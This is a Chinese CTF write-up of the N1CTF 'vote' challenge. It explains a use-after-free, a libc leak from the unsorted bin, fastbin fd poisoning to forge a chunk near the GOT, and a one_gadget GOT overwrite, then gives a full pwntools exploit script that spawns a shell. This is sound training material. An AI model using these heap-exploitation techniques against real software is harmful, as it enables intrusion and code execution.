N1CTF 塞题vote分析:这个题是一个uaf的漏洞题,我们先看看漏洞(如下图),这两部分是很明显的对比的啊。当单独的一个count数组的数据和堆里的数据相同时候,就会释放堆,堆释放后的count还会有指针指向这块内存,释放后我们能够(通过vote)修改数据,典型的uaf。那么我们修改构造(fd)的数据时候,下次申请特定地址的内存的时候,就可以对特定内存进行修改的。
这里的sleep()函数,pthread_create每次调用,都会sleep3秒,所以用脚本vote和cancel的时候总是导致无法触发uaf,调试时候需要在脚本中用time.sleep(3)来完成。
count数组的数值和堆里的fd数值保持一致。
我们先来看几个函数,虽然不一定是核心函数,但可以增长知识哈:
memset:作用是在一段内存块中填充某个给定的值,它是对较大的结构体或数组进行清零操作的一种最快方法
解题过程:
结构体:
{
long int count (malloc data)
long int time (malloc data+8)
char name (malloc data+16)
}
三个位置分别为count,time,name。
构造伪堆,主要构造size和fd的数据:
具体利用过程:
一、leak地址:
通过申请0x80(+0x20的堆头)的堆,释放成unsortbins,成双向链表,fd和bk指向main_arena+88,在通过与libc的偏移计算出libc。
二、构造伪堆:
构造好了伪造的fd之后,如果直接用pthread的地址做伪堆的地址话,会由于size检查导致分配失败。 哦,对了申请了两次伪堆,第一次是为了填充到我们的got表的地址而申请的,方法是在堆的24字节之后伪造堆,第二次是直接向共同表写入数据。
那么我们来找合适的size
找到合适的size了(如下图),我们需要构造了伪堆的位置就是0x601ffa了。
成功修改了got的地址为我们的one_gadget的地址了,下面就是执行vote,触发one_gadget执行了。
利用思路总结:
1.首先leak出libc的地址,通过unsorted bin泄露出其中fd(count)的数据,即是main_arena +88,然后通过偏移计算libc的地址。
2.通过修改fastbin的fd,构造伪堆,伪堆在got_pthread的附近,然后写入数据,修改got_pthread为one_gadget的地址。
3.通过vote函数,触发pthread函数,即执行了one_gadget的命令。
exp如下:
1 #!/usr/bin/env python 2 from pwn import* 3 import time 4 5 local =1 6 debug = 1 7 8 if local: 9 p = process('./vote') 10 11 else: 12 p = remote("127.0.0.1",8080) 13 14 #context.log_level = 'debug' 15 16 def create(num,name): 17 p.recvuntil("Action:") 18 p.sendline("0") 19 p.recvuntil("Please enter the name's size:") 20 p.sendline(str(num)) 21 p.recvuntil("Please enter the name: ") 22 p.sendline(name) 23 24 def show(num): 25 p.recvuntil("Action:") 26 p.sendline("1") 27 p.recvuntil("Please enter the index:") 28 p.sendline(str(num)) 29 30 def vote(num): 31 p.recvuntil("Action:") 32 p.sendline("2") 33 p.recvuntil("Please enter the index:") 34 p.sendline(str(num)) 35 36 def cancel(num): 37 p.recvuntil("Action:") 38 p.sendline("4") 39 p.recvuntil("Please enter the index:") 40 p.sendline(str(num)) 41 def result(): 42 p.recvuntil("Action:") 43 p.sendline("3") 44 45 def add(num,i): 46 for i in range(0,i): 47 vote(str(num)) 48 49 #---------------leak addr---------------------------- 50 51 libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 52 ppp = libc.symbols['write'] 53 print "write=",hex(ppp) 54 55 #print "HHHHHHHHHHHHHHHHHHHHHHHHHHHHHH" 56 #raw_input() 57 58 59 create(0x80,"AAAA") 60 create(0x80,"BBBB") 61 cancel(0) 62 63 #add(0,16) 64 #vote(0) 65 #time.sleep(4) 66 show(0) 67 68 p.recvuntil("count:") 69 main_arena = p.recv(16) 70 #main_arena = p.read(15) 71 print"main_arena =",str(main_arena) 72 73 libc_addr = int(main_arena)-0x3c4b78 74 one = libc_addr + 0x4526a 75 76 print "libc_addr=",hex(libc_addr) 77 print "one=",hex(one) 78 79 80 81 #time.sleep(5) 82 83 #---------------fake heap---------------------------- 84 #add(0,16) 85 got_pthread = 0x601ffa #0x602020 86 print "got_pthread:",hex(got_pthread) 87 88 payload = p64(0x60)+p64(got_pthread) +p64(0xabcdef) 89 90 create(0x40,payload) 91 create(0x40,"DDDD") 92 93 cancel(2) 94 cancel(3) 95 96 add(3,24) 97 create(0x40,"FF") 98 99 #---------------shellcode---------------------------- 100 101 #write = libc_addr +0x3da490 102 write = libc_addr +libc.symbols['write'] 103 #strlen = libc_addr +0x8b720 104 strlen = libc_addr +libc.symbols['strlen'] 105 shellcode = "AAAAAA"+ p64(one) + p64(write) + p64(strlen) 106 #shellcode = "AAAAAA" 107 108 create(0x40,"GG") 109 110 create(0x40,shellcode) 111 112 vote(0) 113 114 115 #gdb.attach(p) 116 p.interactive()